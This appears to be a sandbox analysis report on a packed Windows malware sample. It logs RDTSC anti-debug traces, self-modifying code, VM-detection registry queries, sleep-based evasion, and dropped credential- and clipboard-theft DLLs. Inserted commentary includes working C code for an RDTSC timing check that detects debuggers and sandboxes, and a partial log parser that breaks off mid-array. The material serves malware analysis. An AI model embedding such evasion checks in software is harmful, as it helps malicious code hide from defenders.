Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50BA4 second address: 4E50C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 and cx, 12EEh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E520h 0x0000001a add al, 00000068h 0x0000001d jmp 00007FED74F3E51Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 jmp 00007FED74F3E529h 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, ebx 0x00000032 movsx edi, ax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50C1D second address: 4E50C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d jmp 00007FED7550886Ch 0x00000012 mov cx, DFB1h 0x00000016 popad 0x00000017 push dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FED75508878h 0x00000023 sub si, ECB8h 0x00000028 jmp 00007FED7550886Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50CDD second address: 4E50CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50CF2 second address: 4E50D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007FED75508873h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED75508871h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50D25 second address: 4E50D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50D2B second address: 4E50D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50D31 second address: 4E50D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d jmp 00007FED74F3E520h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edi 0x00000018 mov dh, 5Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50D68 second address: 4E50D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50D6E second address: 4E50D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60D37 second address: 4E60D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4A554E1Ah 0x00000008 pushfd 0x00000009 jmp 00007FED7550886Bh 0x0000000e adc si, 97BEh 0x00000013 jmp 00007FED75508879h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, bx 0x00000021 call 00007FED75508879h 0x00000026 movzx esi, di 0x00000029 pop ebx 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f movsx edi, si 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60D9F second address: 4E60DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60DB8 second address: 4E60E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FED7550886Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, 81F0h 0x00000018 call 00007FED75508879h 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60AB2 second address: 4E60AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60AC5 second address: 4E60ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60ACB second address: 4E60ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60ACF second address: 4E60AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E60AED second address: 4E60AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EE06F0 second address: 4EE0764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FED75508876h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e jmp 00007FED7550886Eh 0x00000023 mov ah, 3Bh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED7550886Fh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EE0764 second address: 4EE0768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EE0768 second address: 4EE076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0863 second address: 4ED0869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0869 second address: 4ED088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FED75508876h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED088F second address: 4ED0893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0893 second address: 4ED0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0897 second address: 4ED089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED089D second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED75508877h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED08E7 second address: 4ED08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED08F7 second address: 4ED08FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED08FB second address: 4ED0901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0901 second address: 4ED0906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0906 second address: 4ED0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5002h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED7550886Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0921 second address: 4ED0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0925 second address: 4ED092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED092B second address: 4ED093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED07CE second address: 4ED07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED07F4 second address: 4ED07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED07F8 second address: 4ED07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED07FC second address: 4ED0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FED74F3E526h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FED74F3E51Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0836 second address: 4ED083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED083A second address: 4ED0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E700F6 second address: 4E700FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E700FA second address: 4E70100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70100 second address: 4E70106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70106 second address: 4E7015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FED74F3E51Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 push ecx 0x00000014 mov bx, F952h 0x00000018 pop edi 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FED74F3E526h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FED74F3E527h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E7015C second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0BB0 second address: 4ED0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FED74F3E527h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0BF9 second address: 4ED0C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FED7550886Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FED75508870h 0x00000019 push F3EDA717h 0x0000001e jmp 00007FED75508871h 0x00000023 add dword ptr [esp], 0C1358EBh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FED75508873h 0x00000032 pop ecx 0x00000033 movsx edx, cx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0C72 second address: 4ED0C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0C78 second address: 4ED0C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0C9B second address: 4ED0C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0C9F second address: 4ED0CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0CA5 second address: 4ED0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, A2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movzx eax, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0CB8 second address: 4ED0CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0CBE second address: 4ED0CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4ED0CDA second address: 4ED0CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
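The RDTSC interceptor entries above are one timing check cut into pieces: every entry starts and ends with rdtsc, the second address of one entry is usually the first address of the next, and the instructions between the two reads are the protector's filler (pushfd/popfd, xchg, sbb/xor with junk immediates, jmp chains). The "Oreans.vxd" and "Software\WinLicense" strings further down this section identify the protector family. The C program below is an added example, not code from the sample or from the report: it shows the technique those entries implement, two reads of the time-stamp counter around a block of work, the minimum delta over several samples, and a threshold comparison that treats an inflated delta as evidence of single-stepping or of an rdtsc trap (which is how the sandbox produced this log). The threshold and sample count are illustrative assumptions; on non-x86 hosts the block substitutes a monotonic clock so the logic still runs.

```c
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>

#if defined(_MSC_VER)
#include <intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }
#elif defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* The real thing: rdtsc leaves the counter in EDX:EAX, as in the trace. */
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
#include <time.h>
/* Portability assumption only: non-x86 hosts use a monotonic ns clock. */
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#endif

/* Stand-in for the filler between the two reads (pushfd/popfd, xchg, sbb,
 * jmp chains in the trace): a little work the compiler cannot remove. */
static volatile uint32_t sink;
static void filler(unsigned iters) {
    uint32_t x = 0x13C54A4Eu;   /* immediate lifted from the trace; value irrelevant */
    for (unsigned i = 0; i < iters; i++)
        x = (x ^ (x << 5)) + i;
    sink = x;
}

/* One measurement, the shape of every interceptor entry: rdtsc, filler, rdtsc. */
uint64_t tsc_delta_once(unsigned filler_iters) {
    uint64_t t0 = read_tsc();
    filler(filler_iters);
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Pure decision. Single-stepping, a breakpoint inside the filler, or a
 * hypervisor trapping rdtsc (what the sandbox does to log these entries)
 * inflates the delta by orders of magnitude. */
int looks_instrumented(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

/* Minimum over several samples: a single sample is polluted by interrupts and
 * context switches, the minimum of many is close to the native cost. */
uint64_t min_tsc_delta(unsigned samples, unsigned filler_iters) {
    uint64_t best = UINT64_MAX;
    for (unsigned i = 0; i < samples; i++) {
        uint64_t d = tsc_delta_once(filler_iters);
        if (d < best) best = d;
    }
    return best;
}

/* The threshold is an illustrative assumption; the sample's real constant sits
 * inside the protected code and is not visible in the report. */
int timing_check(unsigned samples, unsigned filler_iters, uint64_t threshold) {
    return looks_instrumented(min_tsc_delta(samples, filler_iters), threshold);
}

int main(void) {
    uint64_t d = min_tsc_delta(64, 64);
    printf("min delta over 64 samples: %llu\n", (unsigned long long)d);
    printf("instrumented: %s\n", timing_check(64, 64, 50000) ? "yes" : "no");
    return 0;
}
```

Taking the minimum rather than a single delta is what makes a check like this usable on a busy machine, and it is also why stepping over one rdtsc pair in a debugger is not enough to get past it: every pair in the chain above is another sample. The practical counter is the one the sandbox uses, intercepting rdtsc and returning an adjusted counter, rather than single-stepping the filler.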
Source: C:\Users\user\Desktop\wIaKimJFke.exe Special instruction interceptor: First address: 54BB5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe Special instruction interceptor: First address: 54BA89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe Special instruction interceptor: First address: 6F2A0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe Special instruction interceptor: First address: 6F983A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe Special instruction interceptor: First address: 77998A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 30BB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 30BA89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 4B2A0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 4B983A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 53998A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_04ED0C6D rdtsc 0_2_04ED0C6D
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window / User API: threadDelayed 1123
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window / User API: threadDelayed 1032
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window / User API: threadDelayed 1032
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window / User API: threadDelayed 1008
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 9994
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4653
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5194
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7936 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928 Thread sleep count: 1123 > 30
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928 Thread sleep time: -2247123s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932 Thread sleep count: 1032 > 30
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932 Thread sleep time: -2065032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892 Thread sleep count: 287 > 30
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892 Thread sleep time: -8610000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 8008 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920 Thread sleep count: 1032 > 30
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920 Thread sleep time: -2065032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920 Thread sleep count: 1008 > 30
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920 Thread sleep time: -2017008s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008 Thread sleep count: 9994 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008 Thread sleep time: -9994000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
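The thread-delay entries above are easier to read once decoded. The "Thread sleep time" figure is consistent with the sum of the thread's delay intervals in milliseconds (the "s" suffix notwithstanding), and dividing it by the matching "Thread sleep count" gives the per-call interval: TID 7928's 2247123 / 1123 is 1123 sleeps of 2001 ms, about 37 minutes spread over short calls, and TIDs 7932 and 7920 show the same 2001 ms stride; TID 7936's 44022 is 22 such calls, too few to trip the count threshold, so only its time line is printed. Short repeated delays of this kind survive a sandbox that shortens only long delays, whereas the single 180000 ms sleep on TID 8008 would not. The parser below is an added example, not part of the report or of the sample: it pulls those pairs out of report lines copied from this section (constructed input), aggregates them per thread, derives the interval, and applies the two thresholds the report prints next to each line (count > 30, cumulative time >= 30000 ms).

```c
#include <stdio.h>
#include <string.h>

/* Per-thread aggregate of the "Thread sleep count" / "Thread sleep time" lines. */
struct sleep_rec {
    char proc[160];      /* image path after "Source: " */
    int tid;
    long long count;     /* delay calls the sandbox counted for the thread */
    long long total_ms;  /* their summed intervals; the report prints this as "-Ns" */
};

/* Constructed input: lines copied from this section of the report. */
static const char *const SAMPLE_LINES[] = {
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\00c07260dc\\explorgu.exe TID: 7936 Thread sleep time: -44022s >= -30000s",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\00c07260dc\\explorgu.exe TID: 7928 Thread sleep count: 1123 > 30",
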